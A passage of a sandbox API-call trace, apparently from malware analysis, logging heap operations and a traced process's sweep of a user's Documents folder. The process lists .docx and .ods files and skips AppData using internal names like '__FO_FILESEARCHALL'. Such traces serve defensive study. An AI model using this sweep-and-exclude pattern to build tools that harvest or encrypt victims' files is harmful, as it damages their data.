dwFlags=0x0, lpMem=0x76b570 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d20 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e0f8 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e0d0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d10 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e0a8 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e2b0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690da0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b630 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b618 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b600 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d70 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e210 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b660 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b648 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d80 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e238 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b558 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cf0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d00 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4f8 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b510 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e080 | out: hHeap=0x650000) returned 1 [0074.065] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0074.065] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.065] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d00 | out: hHeap=0x650000) returned 1 [0074.065] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x1320068, ftCreationTime.dwLowDateTime=0xc2bb7, ftCreationTime.dwHighDateTime=0x657690, ftLastAccessTime.dwLowDateTime=0xc2ba2, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0xd6310, ftLastWriteTime.dwHighDateTime=0x1340069, nFileSizeHigh=0xc2bb7, nFileSizeLow=0x657380, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="眐e\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e080 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b510 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d00 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.065] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d00 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b510 | out: hHeap=0x650000) returned 1 [0074.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e080 | out: hHeap=0x650000) returned 1 [0074.066] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d00 | out: hHeap=0x650000) returned 1 [0074.066] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b510 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e080 | out: hHeap=0x650000) returned 1 [0074.066] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b858 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dea0 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b408 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b438 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3a8 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b468 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3c0 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0074.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df40 | out: hHeap=0x650000) returned 1 [0074.066] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.066] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.067] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.067] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0074.067] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.067] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.067] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.067] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.067] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.067] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0074.067] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.067] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ad0 [0074.067] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c40 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.067] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.067] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b450 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bf0 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b468 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3a8 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b438 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c60 [0074.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b408 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b510 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b4c8, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x8a50277, nFileSizeHigh=0xb8409, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0074.068] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ce0 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.068] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.068] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.068] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.068] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xace342c0, ftCreationTime.dwHighDateTime=0x1d5bd3c, ftLastAccessTime.dwLowDateTime=0xdfb517b0, ftLastAccessTime.dwHighDateTime=0x1d5e261, ftLastWriteTime.dwLowDateTime=0xdfb517b0, ftLastWriteTime.dwHighDateTime=0x1d5e261, nFileSizeHigh=0x0, nFileSizeLow=0x15694, dwReserved0=0x61e5f4, dwReserved1=0x657690, cFileName="NqZsz9XCQqe D7p.docx", cAlternateFileName="NQZSZ9~1.DOC")) returned 1 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0074.068] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.069] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.069] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0074.069] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.069] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0074.069] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.069] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ffb7c0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x4bae3550, ftLastAccessTime.dwHighDateTime=0x1d5e28a, ftLastWriteTime.dwLowDateTime=0x4bae3550, ftLastWriteTime.dwHighDateTime=0x1d5e28a, nFileSizeHigh=0x0, nFileSizeLow=0xc3fc, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Odo7BQUeZcP1NL2G.ods", cAlternateFileName="ODO7BQ~1.ODS")) returned 1 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0074.069] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.069] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.070] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0074.070] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.070] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.070] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.070] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71df400, ftCreationTime.dwHighDateTime=0x1d5e683, ftLastAccessTime.dwLowDateTime=0xba16f910, ftLastAccessTime.dwHighDateTime=0x1d59824, ftLastWriteTime.dwLowDateTime=0xba16f910, ftLastWriteTime.dwHighDateTime=0x1d59824, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x10, dwReserved1=0x657690, cFileName="oLilEMGSHp90H.docx", cAlternateFileName="OLILEM~1.DOC")) returned 1 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0074.070] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.070] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.071] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 